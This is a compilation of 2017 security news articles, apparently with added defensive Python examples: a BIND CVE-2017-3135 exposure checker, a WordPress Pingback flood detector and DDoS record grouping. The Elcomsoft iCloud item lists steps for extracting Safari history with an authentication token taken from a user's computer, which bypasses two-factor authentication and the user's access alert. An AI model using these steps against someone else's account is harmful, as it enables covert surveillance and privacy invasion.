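    print(triage(build_sample_doc(False), "report.docx"))
```

Either marker alone is enough to quarantine the attachment for a closer look; checking both catches packages where one has been stripped or renamed. This is a structural check only: it says nothing about what the macro does, which is the job of a VBA extractor downstream.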

Recently, security researchers Claudio Guarnieri and Collin Anderson analyzed samples of the MacDownloader malware, which nation-state hackers disguised as a Flash Player update and as a Bitdefender adware removal tool.

According to the researchers, the malware was “poorly” developed at the end of 2016, and its code was copied from other sources. At the time their analysis was written, MacDownloader was undetected by the virus scanning engines on VirusTotal; at the time of this writing, just a dozen vendors recognize the bogus Flash Player and Bitdefender apps as a threat.

This latest case demonstrates that the Apple Mac threat landscape is very active, which is why awareness and a proper security posture are important for Mac users.


When choosing an EET system, the level of security should also be weighed

13.2.2017 SecurityWorld Security
Hacker attacks on unsecured electronic sales registration (EET) systems, loss or misuse of data, and the resulting penalties and criminal prosecution: these are the biggest risks of an ill-considered choice of EET solution, as formulated by eet1, one of the domestic vendors of EET systems.

According to eet1, the risks are considerably higher than those the Czech Chamber of Commerce (HK) recently warned about. According to the Chamber, many businesses face fines and security risks because of hasty connection to EET, above all sanctions for invalid receipts under the Accounting Act or for missing customer displays. The Chamber also warned of the risk of hacker attacks on cash registers and the loss of sensitive business information.

Less than three weeks remain before the launch of the second wave of the EET rollout, which covers retail and wholesale. Yet most businesses and companies still do not address the fact that the amended Act on Criminal Liability of Legal Entities (ZTOPO) came into force on 1 December 2016, under which breaches of personal data protection obligations carry sanctions in the millions of crowns and criminal prosecution.

Furthermore, from May 2018 the General Data Protection Regulation (GDPR) will apply, which substantially tightens these sanctions, up to 20 million euros (or 4% of the company's total worldwide annual turnover for the preceding financial year).

"These threats concern everyone who underestimates the protection of data and personal information. By not knowing how the EET system they buy is secured, businesses expose themselves to a disproportionate risk of criminal prosecution," explains Klaus Hornitschek of eet1.

According to him, the user bears full responsibility for protecting the data, and its entry into the system or the device used, against misuse.

"It is similar to a payment card: you have to protect the PIN, you should use the card with some caution, and of course you should regularly review the transactions that have gone through to see whether any of them is fraudulent or suspicious," adds Jiří Berger, security expert at eet1.


Turkish Man Sent to Prison in U.S. for $55M Cyber Heist

13.2.2017 securityaffairs Cyber
Turkish citizen Ercan Findikoglu, aged 35, was sentenced on Friday by a New York court to 8 years in prison for his leadership role in a cybercriminal organization that caused significant losses to banks worldwide.

Findikoglu, known online as “Segate,” “Predator” and “Oreon,” pleaded guilty in March to computer intrusion conspiracy, access device fraud conspiracy, and effecting transactions with unauthorized access devices. He faced nearly 58 years in prison.

According to authorities, between 2011 and 2013, the criminal gang Findikoglu was part of carried out three major campaigns that resulted in losses totaling more than $55 million.

The cybercrooks hacked into the systems of payment card processing companies, stole card data, including PINs, and eliminated withdrawal limits for those cards. The stolen card data was sent to other members of the group who encoded it onto the magnetic stripe of blank cards. The cards and their PINs were then distributed to a network of cashers who made thousands of fraudulent withdrawals at ATMs around the world.

In the first operation, which took place in February 2011, the fraudsters made 15,000 withdrawals in 18 countries, stealing roughly $10 million. In the next operation, in December 2012, they managed to steal approximately $5 million through 5,000 ATM transactions conducted in 20 countries.

The third and largest operation took place in February 2013, when the fraudsters withdrew roughly $40 million through 36,000 ATM transactions in 24 countries. Cashers in New York alone managed to obtain $2.4 million as a result of nearly 3,000 withdrawals.

Findikoglu was arrested in Germany in 2013 and extradited to the U.S. in 2015. Once he completes his prison sentence in the United States, he will be sent back to Turkey, where he has been sentenced to nearly 20 years in prison for payment card fraud.

The U.S. court that sentenced Findikoglu on Friday also ordered him to pay more than $55 million in restitution, but the New York Daily News reported that Turkish authorities seized all his assets and his current net worth is $150,000.

When they announced Findikoglu’s guilty plea back in March, U.S. authorities said they had already convicted dozens of other members of the cybercrime gang.


Apple kept deleted data in iCloud

13.2.2017 SecurityWorld Apple
Elcomsoft noticed that Apple stores browsing history that users have already deleted. How serious can this problem be for users? It appears that Apple's iCloud retains internet browsing history more than a year old that users deleted long ago. The Russian company Elcomsoft drew attention to the possible affair: from iCloud accounts it managed to pull supposedly deleted Safari browsing history, including the dates and times when users visited specific pages and when they subsequently deleted the records.

"We were able to get to records that were more than a year old," says Vladimir Katalov, head of Elcomsoft.

iCloud users can set history storage so that it is accessible from all their devices. The Russian researchers found, however, that even when a user deletes it, iCloud does not remove it completely but instead keeps it in a format the user can no longer see.

Keeping a copy of such records can, according to Katalov, be "invaluable for intelligence and investigative services", but he adds that it is not entirely clear whether Apple even knew that iCloud was retaining deleted data.

As soon as Elcomsoft raised the matter, Apple began removing the affected records from iCloud, without commenting on the discovery in any way. "But maybe they are just moving them to other servers so they can no longer be reached from outside," adds Katalov, whose team by then could only reach records two weeks old.

This is not the first time Elcomsoft has pointed out a possible lapse by Apple. In the past it found that iCloud also stores users' call history without offering the user the option to turn this synchronization off.

Apple responded at the time that it is a convenience feature allowing users to return calls from any of their devices. Synchronization of browsing history, by contrast, is something users worried about their privacy can at least turn off.


Search engine companies will ban links published by major torrent hubs
13.2.2017 securityaffairs IT

Starting from June 1st, search engine companies will block queries for links to pirated content, including films, TV shows and other copyright-protected material.
It will be even more difficult to search for torrents of ExtraTorrent, KickassTorrents, The Pirate Bay and equivalent services.

In the past copyright holders accused the search engine companies of doing too little to ban infringing links.


There have even been rumors that new legislation could force search engine companies into adopting drastic anti-piracy measures.

Starting from June 1st, the major search engines will block queries searching for specific pirated torrent files.

It will not be possible to find links to pirated content, including films, games, TV shows, music and other copyright-protected material. The search engine companies have joined the fight against online piracy.

The UK’s Intellectual Property Office is working with search engine companies and entertainment firms to reach an agreement on a series of measures to tackle piracy.

“Google and other search companies are close to striking a voluntary agreement with entertainment companies to tackle the appearance of infringing content links in search results.” reads a blog post published by TorrentFreak. “Following roundtable discussions chaired by the UK’s Intellectual Property Office, all parties have agreed that the code should take effect by June 1, 2017.”

The UK government has played a crucial role in bringing the search engine giants and the entertainment firms together, and the parties are reportedly “extremely close” to signing an agreement.

“The search engines involved in this work have been very co-operative, making changes to their algorithms and processes, but also working bilaterally with creative industry representatives to explore the options for new interventions, and how existing processes might be streamlined,” said Baroness Buscombe in Parliament.

“I understand that all parties are keen to finalize and sign up to the voluntary agreement, and so we believe there is no need to take a legislative power at this time.”

“All parties have also agreed that the code should take effect, and the targets in it be reached, by 1 June this year,” the Baroness added.

It will be very interesting to see whether such an agreement reached in the UK can be effective overseas.


A new serious DoS flaw affects BIND DNS software, update it now
12.2.2017 securityaffairs Attack

A new serious denial-of-service (DoS) vulnerability was patched this week by the Internet Systems Consortium (ISC) in the BIND DNS software.
The serious denial-of-service (DoS) vulnerability, tracked as CVE-2017-3135, was patched this week by the Internet Systems Consortium (ISC) in the BIND DNS software.

The vulnerability in the BIND DNS software was reported by Ramesh Damodaran and Aliaksandr Shubnik of Infoblox.

The DoS flaw affects BIND 9.8.8, all 9.9 releases since 9.9.3, all 9.10 releases and all 9.11 releases.

The flaw has been patched with the release of versions 9.9.9-P6, 9.10.4-P6 and 9.11.0-P3.

The flaw, rated “high severity” (CVSS score of 7.5), is remotely exploitable on servers using certain configurations.

“Some configurations using both DNS64 and RPZ can lead to an INSIST assertion failure or a NULL pointer read; in either case named will terminate.” reads the advisory published by the ISC.

“Under some conditions when using both DNS64 and RPZ [Response Policy Zones] to rewrite query responses, query processing can resume in an inconsistent state leading to either an INSIST assertion failure or an attempt to read through a NULL pointer.”

Only servers utilizing both DNS64 and RPZ at the same time are potentially vulnerable.

“When this condition occurs, it will result in either an INSIST assertion failure (and subsequent abort) or an attempt to read through a NULL pointer. On most platforms a NULL pointer read leads to a segmentation fault (SEGFAULT), which causes the process to be terminated,” ISC added.

The advisory recommends updating each vulnerable installation; it also lists possible workarounds, such as removing either DNS64 or RPZ from the configuration, or restricting the contents of the policy zone.
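Only servers that run both DNS64 and RPZ on an affected release need the emergency update, so a quick exposure check combines a version comparison against the fixed releases listed above with a scan of named.conf for both statements. The following Python is an added example written for this page, not ISC's code or tooling. The named.conf fragment is constructed, the comment stripping is deliberately simplified, and the version ranges encode exactly what the advisory quoted above states (9.8.8 is treated as vulnerable, since no fix for it is listed here).

```python
import re

# Fixed releases named in the ISC advisory quoted above, keyed by branch.
# Versions are compared as (major, minor, patch, P-level): "9.9.9-P6" -> (9, 9, 9, 6).
FIXED_RELEASES = {
    (9, 9): (9, 9, 9, 6),
    (9, 10): (9, 10, 4, 6),
    (9, 11): (9, 11, 0, 3),
}


def parse_version(version):
    """Parse "9.10.4" or "9.10.4-P6" into a comparable tuple."""
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)(?:-P(\d+))?", version.strip())
    if not m:
        raise ValueError(f"unrecognised BIND version string: {version!r}")
    major, minor, patch, plevel = m.groups()
    return (int(major), int(minor), int(patch), int(plevel or 0))


def version_vulnerable(version):
    """True if the release is in the affected set described by the advisory.

    Affected: 9.8.8 (no fix listed on this page), 9.9.3 up to but excluding
    9.9.9-P6, every 9.10 release before 9.10.4-P6, every 9.11 release before
    9.11.0-P3. Anything outside those branches is reported as not affected.
    """
    v = parse_version(version)
    branch = v[:2]
    if v[:3] == (9, 8, 8):
        return True
    if branch == (9, 9):
        return (9, 9, 3, 0) <= v < FIXED_RELEASES[branch]
    if branch in FIXED_RELEASES:
        return v < FIXED_RELEASES[branch]
    return False


def strip_comments(conf):
    """Drop /* */, // and # comments (simplified: ignores comment markers inside strings)."""
    conf = re.sub(r"/\*.*?\*/", "", conf, flags=re.S)
    return re.sub(r"(//|#)[^\n]*", "", conf)


def config_uses_dns64_and_rpz(conf):
    """True if the named.conf text enables both a dns64 block and response-policy (RPZ)."""
    text = strip_comments(conf)
    has_dns64 = re.search(r"\bdns64\s+\S+\s*\{", text) is not None
    has_rpz = re.search(r"\bresponse-policy\s*\{", text) is not None
    return has_dns64 and has_rpz


def exposed(version, conf):
    """Exposure requires both an affected release and the DNS64 + RPZ combination."""
    return version_vulnerable(version) and config_uses_dns64_and_rpz(conf)


# Constructed named.conf fragment with the exposed combination of features.
SAMPLE_CONF = """
options {
    recursion yes;
    // NAT64 prefix; combined with RPZ below this is the CVE-2017-3135 trigger
    dns64 64:ff9b::/96 { clients { any; }; };
    response-policy { zone "rpz.example"; };
};
zone "rpz.example" { type master; file "rpz.example.db"; };
"""

if __name__ == "__main__":
    for ver in ("9.10.4-P5", "9.10.4-P6"):
        print(ver, "exposed" if exposed(ver, SAMPLE_CONF) else "not exposed")
```

The version check alone is what a vulnerability scanner reports; the configuration check is what tells you whether to patch tonight or at the next maintenance window. Dropping either the dns64 or the response-policy statement, the workaround the advisory describes, makes exposed() return False without an upgrade.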

In January 2017, the Internet Systems Consortium (ISC) issued updates to fix four high-severity flaws in BIND. Those flaws could also be exploited by a remote attacker to cause a DoS condition.

An attacker can exploit the vulnerabilities to cause the BIND name server process to encounter an assertion failure and stop executing.


Apple’s iCloud saved the deleted Safari browsing history over the years
12.2.2017 securityaffairs Apple

According to the Russian forensic firm Elcomsoft, Apple's iCloud retained deleted Safari browsing history for more than a year, opening the door to surveillance.
According to digital forensics firm Elcomsoft, Apple iCloud retained deleted Safari browsing history for over a year. The experts at Elcomsoft discovered the issue while trying to extract records from iCloud accounts: they were able to retrieve supposedly deleted Safari browser histories, including the date and time each website was visited and when the record was deleted.
Safari history is synced across the devices used by a specific iCloud account. When the user deletes a record on one device, it disappears from all other devices within a few seconds, as long as the devices are connected to the Internet.

Users can set iCloud to store their browsing history, in this way it will be available from all the user’s connected devices. The researchers discovered that even if the user deletes the history, iCloud doesn’t actually erase it but keeps it in a format invisible to the user.

“However, those same records will be kept in Apple iCloud for much longer. In fact, we were able to access records dated more than one year back. The user does not see those records and does not know they still exist on Apple servers.” reads a blog post published by the Elcomsoft’s CEO Vladimir Katalov.


The experts used the Elcomsoft Phone Breaker forensic tool to extract files from an iCloud account.

How does it work?

In order to extract Safari history from iCloud it is necessary to be authenticated to the user’s Apple ID. This can be done with the login credentials or with an authentication token extracted from the user’s computer. Such tokens are automatically created by the iCloud Control Panel on Windows and Mac computers that have been synced with iCloud.

The Elcomsoft Phone Breaker can be used by experts to extract iCloud authentication tokens.

“By using the token to log in, you’ll bypass both the password and the secondary authentication prompt if two-factor authentication is enabled on the user’s account. As a result, iCloud access alert will not be delivered to the user.” states the post.

Below is the procedure for extracting Safari browsing history from iCloud with Elcomsoft Phone Breaker:

Launch Elcomsoft Phone Breaker 6.40 or newer
Click “Download Synced Data from iCloud”
Authenticate with Apple ID/password or binary authentication token
Specify everything you’d like to download. Make sure to check “Safari”

The forensic implications of the discovery are serious, because it makes surveillance activity possible, as explained in the post.

“Forensic use of synced data is hard to underestimate. Unlike cloud backups that are created daily at best, iCloud sync works nearly in real-time. Being able to track suspect’s activities almost no delay can be invaluable for surveillance and investigations.” states Katalov.

“Since deleting browsing history from iCloud is nearly impossible for the user, discovering illicit activities becomes much easier. Experts will be able to recover visits to extremist and other illicit Web sites even if the suspect deletes their browser history or wipes their iPhone.”

Keeping a copy of a user’s browser history can certainly be “invaluable for surveillance and investigations,” Katalov said. But it’s unclear if Apple knew that its iCloud service was storing the deleted records.

Apple didn’t immediately respond to a request for comment, but experts from Elcomsoft noticed that after they disclosed the issue, Apple started “purging” older browser history records from iCloud.

“We have informed media about this issue in advance, and they reached Apple for comments. As far as we know, Apple has not responded, but started purging older history records. For what we know, they could be just moving them to other servers, making deleted records inaccessible from the outside; but we never know for sure. Either way, as of right now, for most iCloud accounts we can see history records for the last two weeks only (deleted records for those two weeks are still there though).” states the blog post. Now only deleted records up to two weeks old can be extracted, the forensic company said.

Elcomsoft suggests disabling the syncing of Safari browsing history to iCloud.


A US minor is behind the cyber attack that hit Brussels airport after bombings
12.2.2017 securityaffairs Cyber

Prosecutors confirmed that the failed cyber attack on Brussels airport a few hours after 2016 bombings was launched by a US minor.
Prosecutors confirmed that the failed cyber attack on Brussels airport a few hours after dramatic 2016 bombings in Belgium’s capital was launched by a US minor.

In March 2016, suicide bombers attacked Zaventem airport and a metro station in the Belgian capital, killing thirty-two people.

“Many more were injured in the attacks. The toll did not include three bombers who died. So-called Islamic State said it was behind the attacks.” reported the BBC.


The US youngster, a 14-year-old based in Pittsburgh, has admitted having launched a cyber attack on the systems of the Brussels airport.

The young hacker launched a cyber attack against the airport’s computer system on the night of 22-23 March 2016, but the cyber incursion failed.

“In a statement on Thursday, Belgium’s federal prosecutors say the attempt to take down Zaventem’s website and hack into the airport’s computer system on the night of 22-23 March 2016 was unsuccessful.” continues the BBC.

The Belgian authorities conducted a joint investigation with the FBI that allowed them to identify the US minor, who “confessed having committed the acts”.

The cyber attack had “no terrorist motives” and, according to prosecutors, it was not related to the Brussels bombings.

According to the prosecutors, the FBI identified and interrogated a minor of American nationality who “confessed having committed the acts”.

“From the investigation and the first analyses of the seized hardware it appeared that there were no terrorist motives,” the statement added.

The prosecutors declined to disclose further information on the case because the investigation is ongoing.

Let me close with an observation on the case:

The first is the lack of awareness of what a cyber crime is. The vast majority of youngsters hack out of boredom or to satisfy their egos, but completely ignore the consequences of a cyber attack. These attacks can have serious consequences, especially in conjunction with tragic events such as those that occurred in Brussels. It is necessary to instill awareness in young people and stimulate debate on cyber issues.

Youngsters could be easily manipulated by threat actors (i.e. terrorists, nation-state actors, cyber criminals), and we cannot underestimate the effectiveness of their activities in cyberspace. Young people are a precious resource for modern society, but unaware youngsters could represent a dangerous threat.


DDoS attacks in Q4 2016
12.2.2017 Kaspersky Attack

Without doubt, 2016 was the year of Distributed Denial of Service (DDoS) with major disruptions in terms of technology, attack scale and impact on our daily life. In fact, the year ended with massive DDoS attacks unseen before, leveraging Mirai botnet technology, whose first appearance was covered in our last DDoS Intelligence Report.

Since then, we have published several other detailed reports dedicated to the major attacks on Dyn’s Domain Name System (DNS) infrastructure and on Deutsche Telekom, which knocked 900K Germans offline in November. Additionally, we tracked similar attacks on Internet service providers (ISPs) in Ireland, the United Kingdom and Liberia, all leveraging IoT devices controlled by Mirai technology and partly targeting home routers in an attempt to create new botnets.

Although ‘Rise of the Machines’, as the Institute for Critical Infrastructure Technology (ICIT) titled its analysis, sounds quite blatant, it clearly shows that stakeholders worldwide, in particular in the United States and the European Union, recognize the lack of security inherent in the functional design of IoT devices and the need to set up a common IoT security ecosystem. And not before time, as we expect to see the emergence of further Mirai botnet modifications and a general increase in IoT botnet activity in 2017.

Altogether, the DDoS attacks we have seen so far are just a starting point, initiated by various actors to draw IoT devices into their own botnets, test-drive Mirai technology and develop attack vectors. The DDoS attacks on five major Russian banks in November are a very good example of this.

First, they demonstrate once again that financial services like the bitcoin trading and blockchain platforms CoinSecure of India and BTC-e of Bulgaria, or William Hill, one of Britain’s biggest betting sites, which took days to come back to full service, were at the highest risk in the fourth quarter and are likely to remain so throughout 2017.

Second, cybercriminals have learnt to manage and launch very sophisticated, carefully planned, and constantly changing multi-vector DDoS attacks adapted to the mitigation policy and capacity of the attacked organization. As per our analysis, the cybercriminals in several other cases we tracked in 2016 started with a combination of various attack vectors gradually checking out a bank’s network and web services to find a point of service failure. Once DDoS mitigation and other countermeasures were initiated, the attack vectors changed over a period of several days.

Overall, these attacks show that the DDoS landscape entered the next stage of its evolution in 2016 with new technology, massive attack power, as well as highly skilled and professional cybercriminals. Unfortunately, this tendency has not yet found its way into the cybersecurity policies of many organizations that are still not ready or are unclear about the necessary investments in DDoS protection services.

Four main trends of the year

In 2016, the DDoS attack market saw a number of significant changes and developments. We have identified the four major trends:

The demise of amplification-type attacks. These attacks have been around for a while and the methods for combating them are well-known and have been perfected over time. They remained quite popular in the first half of 2016, but it was clear their number and volume were gradually declining. By the end of 2016, cybercriminals had almost completely given up using malicious amplification-type attacks, ending a downward trend that had lasted several years. First of all, this is the result of countermeasures being developed for these attacks. It’s also down to a reduction in the number of vulnerable amplification hosts available to the attackers (DNS Amplification attacks are the best illustration of this) as their owners react to the performance problems and losses associated with these attacks and look for ways to patch vulnerabilities.

Rising popularity of attacks on applications and the growth in their use of encryption. For the last few years UDP-based amplification attacks have remained the undisputed leader on the DDoS attack market, while attacks on applications have been relatively rare. In the second half of the year, and particularly in Q4, there was a dramatic increase in the popularity of attacks on applications, which gradually filled the niche previously occupied by amplification attacks. To organize such attacks, time-tested tools (Pandora, Drive, LOIC/HOIC) and new developments are used. Along with the growing popularity of attacks on applications, the number of these attacks using encryption is also growing. The use of encryption in most cases dramatically increases the efficiency of attacks and makes filtering them more difficult. In addition, cybercriminals continue to use an integrated approach, masking a small but effective attack on applications behind a simultaneous large-scale attack, for example, an attack involving a large number of short network packets (short-packet TCP flood).

The rise in popularity of WordPress Pingback attacks. WordPress Pingback-type attacks, which were extremely rare at the start of 2016, had by the fourth quarter occupied a substantial amount of the DDoS attack market. This is currently one of the most popular attack methods targeting applications, and we consider them separately from the overall mass of attacks at the application level. Relatively simple to organize, the “fingerprint” of these attacks is very specific, and the corresponding traffic can be easily separated from the general traffic flow. However, carrying out such an attack using encryption (something that was observed by Kaspersky Lab experts in Q4 2016) greatly complicates filtering and increases the malicious potential of this type of attack.
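One way to pick the Pingback fingerprint out of a web server access log, as an added example that is not part of the Kaspersky report: the verification request a WordPress site sends carries a User-Agent of the form "WordPress/<version>; <blog URL>; verifying pingback from <ip>", and a flood shows up as many distinct WordPress sites "verifying" the same page at once. The log lines and the three-site threshold are constructed assumptions.

```python
"""Flag WordPress Pingback verification traffic in a combined-format access log.

Added example (not the report's code). The User-Agent pattern is the one
WordPress uses for its pingback verification fetch; the sample log lines and
the min_blogs threshold are constructed for this illustration.
"""
import re
from collections import Counter

# Apache/nginx "combined" log format: src ident user [ts] "req" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# The fingerprint: a WordPress site fetching the page named in a pingback to
# verify it. The "from <ip>" part is whatever the pingback sender claimed.
PINGBACK_UA = re.compile(
    r'^WordPress/(?P<ver>[\d.]+); (?P<blog>https?://[^;\s]+); '
    r'verifying pingback from (?P<claimed>\S+)$'
)


def parse_line(line):
    """Return the log fields as a dict, or None for lines that do not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def pingback_hits(lines):
    """Yield (reflecting_blog, source_ip, claimed_ip, request) per pingback fetch.

    Note: with TLS in front of the site this User-Agent is only visible where
    the connection is terminated, which is why the report says encryption
    complicates filtering.
    """
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        m = PINGBACK_UA.match(rec["ua"])
        if m:
            yield m.group("blog"), rec["src"], m.group("claimed"), rec["req"]


def assess(lines, min_blogs=3):
    """A single WordPress site verifying a pingback is normal; many distinct
    sites hitting the same target in one window is the flood signature.
    Returns (is_flood, distinct_blog_count, Counter of hits per blog)."""
    blogs = Counter()
    for blog, _src, _claimed, _req in pingback_hits(lines):
        blogs[blog] += 1
    return len(blogs) >= min_blogs, len(blogs), blogs


# Constructed sample log: three reflecting WordPress sites plus normal traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Nov/2016:10:00:01 +0000] "GET /?p=123 HTTP/1.1" 200 5123 "-" '
    '"WordPress/4.6.1; http://blog-a.example; verifying pingback from 198.51.100.5"',
    '192.0.2.11 - - [05/Nov/2016:10:00:01 +0000] "GET /?p=123 HTTP/1.1" 200 5123 "-" '
    '"WordPress/4.5; http://blog-b.example; verifying pingback from 198.51.100.5"',
    '192.0.2.12 - - [05/Nov/2016:10:00:02 +0000] "GET /?p=123 HTTP/1.1" 200 5123 "-" '
    '"WordPress/4.7; https://blog-c.example/wp; verifying pingback from 198.51.100.5"',
    '203.0.113.4 - - [05/Nov/2016:10:00:02 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" '
    '"Mozilla/5.0"',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    flood, n, per_blog = assess(SAMPLE_LOG)
    print("pingback flood:", flood, "distinct reflecting sites:", n)
    for blog, hits in per_blog.most_common():
        print(f"  {blog}: {hits}")
```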

Use of IoT botnets to carry out DDoS attacks. After the publication of the code on GitHub on 24 October, Kaspersky Lab experts noticed a surge in interest in IoT devices among criminals, especially their use in botnets to perform DDoS attacks. The concepts and methods demonstrated by the creators of the Mirai botnet were used as the basis for a large number of new malicious codes and botnets consisting of IoT devices. These kinds of botnets were used in numerous attacks on Russian banks in Q4 2016. Unlike classic botnets, IoT-based botnets are huge in terms of both their volume and potential, something that was proved by the high-profile attack on the DNS provider Dyn, which indirectly affected the work of many major web resources (e.g., Twitter, Airbnb, CNN and many others).

Statistics for botnet-assisted DDoS attacks

Methodology

Kaspersky Lab has extensive experience in combating cyber threats, including DDoS attacks of various types and levels of complexity. The company’s experts monitor botnet activity with the help of the DDoS Intelligence system.

DDoS Intelligence (part of Kaspersky DDoS Protection) is designed to intercept and analyze commands sent to bots from command and control (C&C) servers, and does not have to wait until user devices are infected or cybercriminal commands are executed in order to gather data.

This report contains the DDoS Intelligence statistics for the fourth quarter of 2016.

In the context of this report, a single (separate) DDoS attack is defined as an incident during which any break in botnet activity lasts less than 24 hours. If the same web resource was attacked by the same botnet after a break of more than 24 hours, this is regarded as a separate DDoS attack. Attacks on the same web resource from two different botnets are also regarded as separate attacks.

The geographic distribution of DDoS victims and C&C servers is determined according to their IP addresses. In this report, the number of DDoS targets is calculated based on the number of unique IP addresses reported in the quarterly statistics.

It is important to note that DDoS Intelligence statistics are limited to those botnets detected and analyzed by Kaspersky Lab. It should also be noted that botnets are just one of the tools used to carry out DDoS attacks; therefore, the data presented in this report does not cover every DDoS attack that has occurred within the specified time period.

Q4 Summary

Resources in 80 countries (vs. 67 in Q3) were targeted by DDoS attacks in Q4 2016.
71.6% of targeted resources were located in China.
South Korea, China and the US remained leaders in terms of both the number of targets and number of detected C&C servers.
The longest DDoS attack in Q4 2016 lasted for 292 hours (or 12.2 days) – significantly longer than the previous quarter’s maximum (184 hours, or 7.7 days) and set a record for 2016.
SYN DDoS, TCP DDoS and HTTP DDoS remain the most common DDoS attack scenarios. The proportion of attacks using the SYN DDoS method decreased by 5.7 p.p., while the shares of both TCP DDoS and HTTP DDoS grew considerably.
In Q4 2016, the percentage of attacks launched from Linux botnets decreased slightly and accounted for 76.7% of all detected attacks.
Geography of attacks

In Q4 2016, the geography of DDoS attacks expanded to 80 countries, with China accounting for 76.97% (4.4 p.p. more than the previous quarter). The US (7.3%) and South Korea (7%) were once again second and third respectively.

The Top 10 most targeted countries accounted for 96.9% of all attacks. Canada (0.8%) appeared in the rating, replacing Italy. Russia (1.75%) moved from fifth to fourth thanks to a 0.6 p.p. decline in Vietnam’s share.

 

Distribution of DDoS attacks by country, Q3 2016 vs. Q4 2016

Statistics for the fourth quarter show that the 10 most targeted countries accounted for 96.3% of all DDoS attacks.

 

Distribution of unique DDoS attack targets by country, Q3 2016 vs. Q4 2016

71.6% of targeted resources were located in China, which was 9 p.p. more than the previous quarter. There was a small increase in the number of targets in South Korea (+0.7 p.p.). The US rounded off the top three, even though its share decreased by 9.7 p.p. (9% vs. 18.7% in Q3).

The shares of the other countries in the Top 10 remained almost unchanged, with the exception of Japan which saw a fall of 1 p.p. Italy and the Netherlands left the rating and were replaced by Germany (0.56%) and Canada (0.77%).

Changes in DDoS attack numbers

The distribution of DDoS activity was relatively even throughout Q4, with the exception of a sharp peak registered on 5 November when the largest number of attacks in 2016 – 1,915 – was recorded. The quietest day of Q4 was 23 November (90 attacks). However, by 25 November cybercriminal activity had increased to 981 attacks.

 

Number of DDoS attacks over time* in Q4 2016

*DDoS attacks may last for several days. In this timeline, the same attack may be counted several times, i.e. one time for each day of its duration.
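The two counting rules used in this report, the 24-hour break that separates one attack from the next (from the Methodology section) and the once-per-day timeline count above, worked through in code as an added example that is not Kaspersky’s own. The C&C observations below are constructed sample data; the record format is an assumption.

```python
"""Group intercepted C&C attack commands into distinct DDoS attacks and build
the per-day timeline, following the report's definitions.

Added example, not the DDoS Intelligence system's code. Observations are
constructed (timestamp, target IP, botnet id) triples.
"""
from collections import Counter
from dataclasses import dataclass
from datetime import datetime, timedelta

# Report's rule: a break of MORE than 24 hours in the same botnet's activity
# against the same target starts a new attack.
MAX_GAP = timedelta(hours=24)


@dataclass
class Attack:
    target: str
    botnet: str
    start: datetime
    end: datetime

    @property
    def duration(self) -> timedelta:
        return self.end - self.start


def group_attacks(observations):
    """Return a list of Attack, one per (target, botnet) activity run.

    observations: iterable of (timestamp, target_ip, botnet_id), one per
    attack command seen from a C&C server.
    """
    per_key = {}
    for ts, target, botnet in sorted(observations):
        # A different target or a different botnet is always a separate attack.
        per_key.setdefault((target, botnet), []).append(ts)

    attacks = []
    for (target, botnet), times in per_key.items():
        start = prev = times[0]
        for ts in times[1:]:
            if ts - prev > MAX_GAP:       # break longer than 24h: new attack
                attacks.append(Attack(target, botnet, start, prev))
                start = ts
            prev = ts
        attacks.append(Attack(target, botnet, start, prev))
    return sorted(attacks, key=lambda a: (a.start, a.target, a.botnet))


def attacks_per_day(attacks):
    """Timeline count as in the report's chart: an attack spanning several
    days is counted once for each calendar day of its duration."""
    counts = Counter()
    for a in attacks:
        day = a.start.date()
        while day <= a.end.date():
            counts[day.isoformat()] += 1
            day += timedelta(days=1)
    return dict(counts)


# Constructed sample: (timestamp, target, botnet)
SAMPLE = [
    (datetime(2016, 11, 5, 1, 0), "203.0.113.10", "botnet-A"),
    (datetime(2016, 11, 5, 9, 0), "203.0.113.10", "botnet-A"),
    (datetime(2016, 11, 6, 6, 0), "203.0.113.10", "botnet-A"),   # 21h gap: same attack
    (datetime(2016, 11, 8, 12, 0), "203.0.113.10", "botnet-A"),  # 54h gap: new attack
    (datetime(2016, 11, 5, 2, 0), "203.0.113.10", "botnet-B"),   # other botnet: separate
    (datetime(2016, 11, 5, 3, 0), "198.51.100.7", "botnet-A"),   # other target: separate
]

if __name__ == "__main__":
    found = group_attacks(SAMPLE)
    for a in found:
        print(f"{a.target} by {a.botnet}: {a.start} -> {a.end} ({a.duration})")
    print("longest:", max(a.duration for a in found))
    print("per day:", attacks_per_day(found))
```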

Saturday was the busiest day of the week in Q4 for DDoS attacks (18.2% of attacks), followed by Friday, 1.7 p.p. behind. Monday became the quietest day of the week for DDoS attacks (11.6%).

 

Distribution of DDoS attack numbers by day of the week, Q3 and Q4 2016

Types and duration of DDoS attacks

The SYN DDoS method remained the most popular: its share accounted for 75.3% of attacks, although this figure is 5.7 p.p. less than in the previous quarter. The figures for other attack types increased slightly – TCP DDoS (from 8.2% to 10.7%) and ICMP DDoS (from 1.7% to 2.2%). UDP’s contribution remained almost unchanged.

 

Distribution of DDoS attacks by type, Q3 and Q4 2016

Distribution of DDoS attacks by duration (hours) in Q4 2016 was distinctly uneven. While the share of attacks that lasted no more than four hours remained almost the same as the previous quarter (it decreased by just 1.56 p.p.), the figures for the other time periods changed significantly.

The share of attacks that lasted 5-9 hours increased from 14.49% to 19.28%. Attacks lasting 10-19 hours fell by 1.3 p.p., while the proportion of attacks that lasted 20-49 hours fell by even more – minus 3.35 p.p. The percentage of even longer attacks decreased considerably – the share of attacks lasting 50–99 hours accounted for 0.94%, compared to 3.46% in the previous quarter. The share of attacks that lasted 100-150 hours grew and reached 2.2%, which meant that Q4 saw twice as many of these attacks as those lasting 50-99 hours. There were very few cases of attacks lasting longer than 150 hours.

The longest DDoS attack in the fourth quarter lasted for 292 hours, 8 hours longer than the Q3 maximum. This was also the longest attack of 2016.

 

Distribution of DDoS attacks by duration (hours), Q3 and Q4 2016

C&C servers and botnet types

